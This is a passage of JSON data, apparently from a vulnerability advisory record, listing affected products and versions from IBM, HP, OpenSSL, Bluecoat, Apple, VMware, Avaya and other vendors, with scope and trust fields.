        "model": "rational software architect realtime edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "bladecenter advanced management module 25r5778",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "q",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "security network intrusion prevention system gx5208-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "bladecenter -s",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1948"
      },
      {
        "model": "flex system fc3171 8gb san pass-thru",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.3"
      },
      {
        "model": "security network intrusion prevention system gx4004",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "bladesystem c-class onboard administrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.11"
      },
      {
        "model": "k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.0"
      },
      {
        "model": "upward integration modules scvmm add-in",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3"
      },
      {
        "model": "system management homepage",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4.1"
      },
      {
        "model": "security network intrusion prevention system gx5108",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "malware analysis appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "4.1"
      },
      {
        "model": "project openssl 1.0.0d",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "cloudsystem matrix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "project openssl 1.0.1e",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx5008",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "bladesystem c-class onboard administrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.21"
      },
      {
        "model": "project openssl beta3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "vcenter server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.1"
      },
      {
        "model": "insight control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "project openssl 0.9.8u",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0"
      },
      {
        "model": "security network intrusion prevention system gx5108-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "project openssl 1.0.1a",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.1.0"
      },
      {
        "model": "aspera shares",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "1.7.5"
      },
      {
        "model": "norman shark industrial control system protection",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "5.2.3"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "norman shark industrial control system protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "5.1"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.1"
      },
      {
        "model": "packetshaper s-series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "11.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.0.1"
      },
      {
        "model": "security network intrusion prevention system gx5108",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "project openssl k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.0.4"
      },
      {
        "model": "security network intrusion prevention system gx3002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "security network intrusion prevention system gx5008",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "flex system chassis management module 1.20.2",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "connect:enterprise secure client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.0.0"
      },
      {
        "model": "project openssl 1.0.0g",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "cloudsystem enterprise software",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.1.2"
      },
      {
        "model": "sterling connect:enterprise for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.5"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "tivoli netcool/reporter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5"
      },
      {
        "model": "proxyav",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "3.5"
      },
      {
        "model": "insight control server provisioning",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.1"
      },
      {
        "model": "norman shark scada protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "5.0"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.3.1"
      },
      {
        "model": "netscaler t1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.2"
      },
      {
        "model": "project openssl 0.9.8zb",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "esxi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.1"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2"
      },
      {
        "model": "norman shark industrial control system protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "5.2"
      },
      {
        "model": "j",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "project openssl 1.0.1j",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "upward integration modules for vmware vsphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.1"
      },
      {
        "model": "wb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "content analysis system software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.1.2.1"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.3"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1"
      },
      {
        "model": "security network intrusion prevention system gx7412",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.3"
      },
      {
        "model": "image construction and composition tool",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3.1.0"
      },
      {
        "model": "n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "policycenter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "9.2"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "project openssl 1.0.0o",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "pa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "m210",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "vsr1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "cacheflow",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "3.2"
      },
      {
        "model": "project openssl 0.9.8w",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "flex system ib6131 40gb infiniband switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.4"
      },
      {
        "model": "bladesystem c-class onboard administrator",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.40"
      },
      {
        "model": "cognos tm1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5.2"
      },
      {
        "model": "oneview",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.0"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "119000"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "5.0.2"
      },
      {
        "model": "flex system fc3171 8gb san switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.4"
      },
      {
        "model": "x-series xos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "10.0"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.1.0"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.11"
      },
      {
        "model": "project openssl 1.0.0m",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "sterling connect:express for unix ifix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.0.11150-11"
      },
      {
        "model": "norman shark network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "5.0"
      },
      {
        "model": "nextscale n1200 enclosure fan power controller fhet21c-2.04",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.1"
      },
      {
        "model": "rational application developer for websphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "business server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "1"
      },
      {
        "model": "sterling connect:enterprise for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.4.4"
      },
      {
        "model": "project openssl 1.0.1g",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "tivoli composite application manager for transactions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.4"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5.0"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "project openssl 0.9.8m",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "norman shark scada protection",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "5.2.3"
      },
      {
        "model": "project openssl j",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "rational application developer for websphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "security network intrusion prevention system gx4004",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "security virtual server protection for vmware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.1"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "megaraid storage manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "15.03.01.00"
      },
      {
        "model": "command center appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "aspera shares",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "1.0.1"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.4"
      },
      {
        "model": "bladecenter -t",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8720"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.23"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.0.2"
      },
      {
        "model": "tivoli netcool/system service monitor fp11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.2.1"
      },
      {
        "model": "sterling file gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.2.4"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.0"
      },
      {
        "model": "initiate master data service patient hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "bladesystem c-class onboard administrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.22"
      },
      {
        "model": "netscaler gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "project openssl 1.0.1i",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70000"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.2"
      },
      {
        "model": "r2122",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7900"
      },
      {
        "model": "flex system chassis management module 1.40.2",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "tivoli netcool/system service monitor fp12",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.0"
      },
      {
        "model": "project openssl 1.0.0h",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx3002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "tivoli provisioning manager for os deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.1.1"
      },
      {
        "model": "infosphere master data management patient hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0"
      },
      {
        "model": "netcool/system service monitor fp1 p14",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0-"
      },
      {
        "model": "flex system en6131 40gb ethernet switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.4"
      },
      {
        "model": "tivoli composite application manager for transactions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.5"
      },
      {
        "model": "security network intrusion prevention system gx5108",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.0.0"
      },
      {
        "model": "sterling connect:express for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.6"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.1.1"
      },
      {
        "model": "flex system ib6131 40gb infiniband switch",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.4.1110"
      },
      {
        "model": "security network intrusion prevention system gx5008-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "security network intrusion prevention system gx5008",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.3"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.1"
      },
      {
        "model": "policycenter",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "9.2.10"
      },
      {
        "model": "netcool/system service monitor fp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "bladecenter -s",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8886"
      },
      {
        "model": "security network intrusion prevention system gx7800",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.10"
      },
      {
        "model": "security network intrusion prevention system gx7412-10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.0"
      },
      {
        "model": "office connect ps1810",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "qradar siem mr2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "aura communication manager ssp04",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "upward integration modules for microsoft system center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.5.2"
      },
      {
        "model": "ex series network switches for ibm products pre 12.3r9",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "project openssl 0.9.8r",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.7"
      },
      {
        "model": "cacheflow",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "3.0"
      },
      {
        "model": "aspera faspex",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.0.3"
      },
      {
        "model": "security network intrusion prevention system gx3002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "m.10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.1.3"
      },
      {
        "model": "project openssl 0.9.8n",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "connect:enterprise command line client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.14"
      },
      {
        "model": "virtual connect enterprise manager sdk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "79000"
      },
      {
        "model": "malware analyzer g2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "3.5"
      },
      {
        "model": "aspera proxy",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "1.2.3"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "cloudsystem matrix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "proxyav",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "3.4"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "project openssl 0.9.8y",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "bcaaa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.1"
      },
      {
        "model": "aspera mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2"
      },
      {
        "model": "cloudsystem foundation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.0.2"
      },
      {
        "model": "upward integration modules for microsoft system center",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.5.3"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.1"
      },
      {
        "model": "project openssl beta4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.0"
      },
      {
        "model": "security network intrusion prevention system gx7412",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.3"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "h.10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.11"
      },
      {
        "model": "upward integration modules hardware management pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.5.2"
      },
      {
        "model": "upward integration modules for microsoft system center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.2"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.6"
      },
      {
        "model": "netscaler application delivery controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "project openssl 1.0.0l",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "vcenter server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.0"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.20"
      },
      {
        "model": "security network intrusion prevention system gx4004-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "upward integration modules integrated installer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.5.2"
      },
      {
        "model": "general parallel file system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.5.0"
      },
      {
        "model": "norman shark scada protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "5.2"
      },
      {
        "model": "project openssl beta5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.0"
      },
      {
        "model": "tivoli netcool/system service monitor fp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0.1"
      },
      {
        "model": "bladecenter -e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7967"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.1.1"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.3"
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "insight control server deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.0"
      },
      {
        "model": "aspera drive",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "infosphere master data management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.3"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "5.0.9"
      },
      {
        "model": "content analysis system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.2"
      },
      {
        "model": "content analysis system software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.1.53"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.1.4"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.3"
      },
      {
        "model": "project openssl 0.9.8p",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "flex system chassis management module 1.20.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "security analytics platform",
        "scope": "ne",
